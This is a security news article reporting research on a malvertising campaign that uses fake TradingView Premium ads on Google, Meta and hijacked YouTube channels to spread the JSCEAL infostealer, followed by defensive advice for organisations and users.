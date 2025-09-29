Scam ads for free access to TradingView Premium have expanded from Meta ads to Google Ads and YouTube, leveraging compromised accounts to spread JSCEAL malware, Bitdefender revealed last week.

The malware campaign previously leveraged Facebook ads to redirect users to websites imitating the TradingView brand, enticing victims to install malicious files disguised as a premium version of the popular financial analysis platform, Check Point Research reported in July.

More recently, attackers have compromised other companies’ Google accounts to launch malicious Google Ad campaigns and hijack verified YouTube channels to promote their malicious links, Bitdefender discovered. Instead of directly linking to a malicious website, the ads redirect users to unlisted YouTube videos from hijacked accounts.

The YouTube profiles used in this campaign have been scrubbed of their previous content, rebranded to impersonate the official TradingView YouTube channel and made to display linked playlists from the legitimate TradingView channel on their front page, hiding the fact that they have no public videos of their own.

The videos themselves claim users can access TradingView Premium for free and direct them to click a link in the description of the YouTube video, which ultimately leads to the malware download. Bitdefender found that at least one of the unlisted videos had gained more than 182,000 views in a matter of days.

Victims of the campaign initially install a malicious downloader, installer.exe, which creates a scheduled task that adds Windows Defender exclusions and then downloads and executes the next stage, Bitdefender explained. The downloader leverages a large file size (greater than 700 MB) and anti-sandbox measures to avoid detection.

The researchers noted that the attackers use PostHog, Facebook Pixel tracking, Google Ads Conversion Tracking, Microsoft Ads Pixel tracking and Adprofex on their malicious sites to track whether visitors came from an ad and redirect other visitors to benign content.

The next stage downloads the final payload JSCEAL, also known as WeevilProxy, which is an infostealer and spyware combo that can intercept all user network traffic, log keystrokes and take screenshots while also stealing cookie, password and cryptocurrency wallet data.

The attacker infrastructure in this campaign consists of more than 500 domains and subdomains, with thousands of Facebook pages publishing hundreds of ads daily, in addition to the handful of compromised Google accounts found by Bitdefender. In their research, the Bitdefender team also discovered emerging macOS and Android samples of the malware, which has typically targeted Windows machines.

Organizations are recommended to defend their advertising and social media accounts, including their Google and Meta accounts, YouTube channels and Facebook pages, with multi-factor authentication (MFA) and ensure they have set valid account recovery options in the event of a compromise.

Roles and permissions for social media accounts should be regularly audited to prevent unauthorized uploads or changes and monitored for unusual activity to prevent misuse that could damage brand reputation and put followers at risk.

Additionally, users should be wary of potentially malicious ads promising free access to premium services such as TradingView Premium and ensure any software downloads are only made from official vendor websites. They should also be cautious when following links in YouTube video descriptions and check a brand channel’s username and subscriber count to identify potential impersonations.